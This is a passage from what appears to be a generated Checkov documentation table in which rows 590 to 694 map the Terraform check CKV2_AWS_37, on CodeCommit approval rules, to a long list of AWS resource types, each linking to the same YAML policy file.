aws_api_gateway_request_validator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 590 | CKV2_AWS_37 | resource | 
aws_api_gateway_resource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 591 | CKV2_AWS_37 | resource | aws_api_gateway_rest_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 592 | CKV2_AWS_37 | resource | aws_api_gateway_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 593 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 594 | CKV2_AWS_37 | resource | aws_api_gateway_usage_plan_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 595 | CKV2_AWS_37 | resource | aws_api_gateway_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 596 | CKV2_AWS_37 | resource | aws_apigatewayv2_api | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 597 | CKV2_AWS_37 | resource | aws_apigatewayv2_api_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 598 | CKV2_AWS_37 | resource | aws_apigatewayv2_authorizer | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 599 | CKV2_AWS_37 | resource | aws_apigatewayv2_deployment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 600 | CKV2_AWS_37 | resource | aws_apigatewayv2_domain_name | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 601 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 602 | CKV2_AWS_37 | resource | aws_apigatewayv2_integration_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 603 | CKV2_AWS_37 | resource | 
aws_apigatewayv2_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 604 | CKV2_AWS_37 | resource | aws_apigatewayv2_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 605 | CKV2_AWS_37 | resource | aws_apigatewayv2_route_response | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 606 | CKV2_AWS_37 | resource | aws_apigatewayv2_stage | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 607 | CKV2_AWS_37 | resource | aws_apigatewayv2_vpc_link | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 608 | CKV2_AWS_37 | resource | aws_app_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 609 | CKV2_AWS_37 | resource | aws_appautoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 610 | CKV2_AWS_37 | resource | aws_appautoscaling_scheduled_action | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 611 | CKV2_AWS_37 | resource | aws_appautoscaling_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 612 | CKV2_AWS_37 | resource | aws_appmesh_mesh | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 613 | CKV2_AWS_37 | resource | aws_appmesh_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 614 | CKV2_AWS_37 | resource | aws_appmesh_virtual_node | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 615 | CKV2_AWS_37 | resource | aws_appmesh_virtual_router | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 616 | CKV2_AWS_37 | resource | aws_appmesh_virtual_service | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 617 | CKV2_AWS_37 | resource | aws_appsync_api_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 618 | CKV2_AWS_37 | resource | aws_appsync_datasource | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 619 | CKV2_AWS_37 | resource | aws_appsync_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 620 | CKV2_AWS_37 | resource | aws_appsync_graphql_api | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 621 | CKV2_AWS_37 | resource | aws_appsync_resolver | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 622 | CKV2_AWS_37 | resource | aws_athena_database | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 623 | CKV2_AWS_37 | resource | 
aws_athena_named_query | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 624 | CKV2_AWS_37 | resource | aws_athena_workgroup | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 625 | CKV2_AWS_37 | resource | aws_autoscaling_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 626 | CKV2_AWS_37 | resource | aws_autoscaling_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 627 | CKV2_AWS_37 | resource | aws_autoscaling_lifecycle_hook | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 628 | CKV2_AWS_37 | resource | aws_autoscaling_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 629 | CKV2_AWS_37 | resource | aws_autoscaling_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 630 | CKV2_AWS_37 | resource | aws_autoscaling_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 631 | CKV2_AWS_37 | resource | aws_backup_plan | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 632 | CKV2_AWS_37 | resource | aws_backup_selection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 633 | CKV2_AWS_37 | resource | aws_backup_vault | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 634 | CKV2_AWS_37 | resource | aws_batch_compute_environment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 635 | CKV2_AWS_37 | resource | aws_batch_job_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 636 | CKV2_AWS_37 | resource | aws_batch_job_queue | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 637 | CKV2_AWS_37 | resource | aws_budgets_budget | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 638 | CKV2_AWS_37 | resource | aws_cloud9_environment_ec2 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 639 | CKV2_AWS_37 | resource | aws_cloudformation_stack | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 640 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 641 | CKV2_AWS_37 | resource | aws_cloudformation_stack_set_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 642 | CKV2_AWS_37 | resource | aws_cloudfront_distribution | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 643 | CKV2_AWS_37 | resource 
| aws_cloudfront_origin_access_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 644 | CKV2_AWS_37 | resource | aws_cloudfront_public_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 645 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 646 | CKV2_AWS_37 | resource | aws_cloudhsm_v2_hsm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 647 | CKV2_AWS_37 | resource | aws_cloudtrail | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 648 | CKV2_AWS_37 | resource | aws_cloudwatch_dashboard | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 649 | CKV2_AWS_37 | resource | aws_cloudwatch_event_permission | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 650 | CKV2_AWS_37 | resource | aws_cloudwatch_event_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 651 | CKV2_AWS_37 | resource | aws_cloudwatch_event_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 652 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 653 | CKV2_AWS_37 | resource | aws_cloudwatch_log_destination_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 654 | CKV2_AWS_37 | resource | aws_cloudwatch_log_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 655 | CKV2_AWS_37 | resource | aws_cloudwatch_log_metric_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 656 | CKV2_AWS_37 | resource | 
aws_cloudwatch_log_resource_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 657 | CKV2_AWS_37 | resource | aws_cloudwatch_log_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 658 | CKV2_AWS_37 | resource | aws_cloudwatch_log_subscription_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 659 | CKV2_AWS_37 | resource | aws_cloudwatch_metric_alarm | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 660 | CKV2_AWS_37 | resource | aws_codebuild_project | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 661 | CKV2_AWS_37 | resource | aws_codebuild_source_credential | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 662 | CKV2_AWS_37 | resource | aws_codebuild_webhook | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 663 | CKV2_AWS_37 | resource | aws_codecommit_repository | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 664 | CKV2_AWS_37 | resource | aws_codecommit_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 665 | CKV2_AWS_37 | resource | aws_codedeploy_app | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 666 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 667 | CKV2_AWS_37 | resource | aws_codedeploy_deployment_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 668 | CKV2_AWS_37 | resource | aws_codepipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 669 | CKV2_AWS_37 | resource | aws_codepipeline_webhook | Ensure 
CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 670 | CKV2_AWS_37 | resource | aws_codestarnotifications_notification_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 671 | CKV2_AWS_37 | resource | aws_cognito_identity_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 672 | CKV2_AWS_37 | resource | aws_cognito_identity_pool_roles_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 673 | CKV2_AWS_37 | resource | aws_cognito_identity_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 674 | CKV2_AWS_37 | resource | aws_cognito_resource_server | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 675 | CKV2_AWS_37 | resource | aws_cognito_user_group | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 676 | CKV2_AWS_37 | resource | aws_cognito_user_pool | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 677 | CKV2_AWS_37 | resource | aws_cognito_user_pool_client | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 678 | CKV2_AWS_37 | resource | aws_cognito_user_pool_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 679 | CKV2_AWS_37 | resource | aws_config_aggregate_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 680 | CKV2_AWS_37 | resource | aws_config_config_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 681 | CKV2_AWS_37 | resource | aws_config_configuration_aggregator | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 682 | CKV2_AWS_37 | resource | 
aws_config_configuration_recorder | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 683 | CKV2_AWS_37 | resource | aws_config_configuration_recorder_status | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 684 | CKV2_AWS_37 | resource | aws_config_delivery_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 685 | CKV2_AWS_37 | resource | aws_config_organization_custom_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 686 | CKV2_AWS_37 | resource | aws_config_organization_managed_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 687 | CKV2_AWS_37 | resource | aws_cur_report_definition | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 688 | CKV2_AWS_37 | resource | aws_customer_gateway | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 689 | CKV2_AWS_37 | resource | aws_datapipeline_pipeline | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 690 | CKV2_AWS_37 | resource | aws_datasync_agent | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 691 | CKV2_AWS_37 | resource | aws_datasync_location_efs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 692 | CKV2_AWS_37 | resource | aws_datasync_location_nfs | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 693 | CKV2_AWS_37 | resource | aws_datasync_location_s3 | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 694 | CKV2_AWS_37 | resource | aws_datasync_location_smb 